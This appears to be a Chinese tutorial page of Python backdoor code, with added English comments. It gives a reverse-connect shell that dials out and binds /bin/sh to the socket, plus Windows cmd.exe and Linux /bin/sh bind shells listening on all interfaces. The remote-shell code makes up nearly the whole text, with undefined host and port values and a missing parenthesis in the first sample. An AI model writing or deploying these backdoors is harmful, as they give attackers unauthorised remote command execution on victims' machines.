Python反向连接后门

import socket, subprocess, os

# Reverse-connect shell sample as shown on the page: the process dials out,
# then replaces its own fd 0/1/2 with the socket so the shell it spawns
# reads from and writes to the remote peer. `host` and `port` are not
# defined anywhere in this snippet. From a defender's viewpoint the
# observable artefact is a `/bin/sh -i` whose stdin/stdout/stderr are a
# connected TCP socket rather than a terminal.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM
s.connect((host,port))
os.dup2(s.fileno(),0) # fd 0 is the process's stdin
os.dup2(s.fileno(),1) # fd 1 is the process's stdout
os.dup2(s.fileno(),2) # fd 2 is the process's stderr
# subprocess.call gives the child the parent's fds 0/1/2 (now the socket)
# and blocks until the shell exits; p receives the exit status.
p=subprocess.call(["/bin/sh","-i"])

Python正向连接后门

  1. Windows正向连接CmdShell
from socket import *
import subprocess
import os, threading

def send(talk, proc):
# Pump thread: forwards every line the child writes on stdout to the
# connected peer `talk`. `time` is imported but never used. readline()
# returns b'' once the child's stdout closes, and nothing breaks out of
# the loop, so it then spins sending empty payloads — presumably
# unintended.
import time
while True:
msg = proc.stdout.readline()
talk.send(msg)

# Bind-shell server sample as shown on the page (Windows variant): listens on
# all interfaces, accepts one peer, spawns cmd.exe with its std streams
# piped, and relays bytes in both directions. `port` is not defined in
# this snippet.
server=socket(AF_INET,SOCK_STREAM)
server.bind(('0.0.0.0',port))
server.listen(5)
talk, addr = server.accept()  # blocks until the first peer connects
print("connecting ", addr)
# cmd.exe /K keeps the console open after each command. stderr is piped
# but never read anywhere in this file, so it may fill up and stall the
# child.
proc = subprocess.Popen('cmd.exe /K', stdin=subprocess.PIPE,
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
shell=True)
# send() (defined above) copies child stdout to the peer on a daemon thread;
# setDaemon() is the legacy spelling of the `daemon` attribute.
t = threading.Thread(target = send, args = (talk, proc))
t.setDaemon(True)
t.start()
# Peer -> child stdin. recv() returns b'' when the peer hangs up and there
# is no break, so the loop keeps writing empty buffers; server.close()
# below is therefore never reached.
while True:
cmd=talk.recv(1024)
proc.stdin.write(cmd)
proc.stdin.flush()
server.close()
  1. linux版/bin/sh
from socket import *
import subprocess
import os, threading, sys

# Bind-shell server sample as shown on the page (Linux variant): accepts one
# peer and hands the accepted socket to the child as its stdin/stdout/stderr
# (Popen accepts any object with a fileno()). `port` is not defined in this
# snippet; os, threading and sys are imported but unused here. The script
# ends immediately after Popen, and neither socket is closed explicitly.
server=socket(AF_INET,SOCK_STREAM)
server.bind(('0.0.0.0',port))
server.listen(5)
talk, addr = server.accept()  # blocks until the first peer connects
print("connecting ", addr)
proc = subprocess.Popen(["/bin/sh","-i"], stdin=talk,
stdout=talk, stderr=talk, shell=True)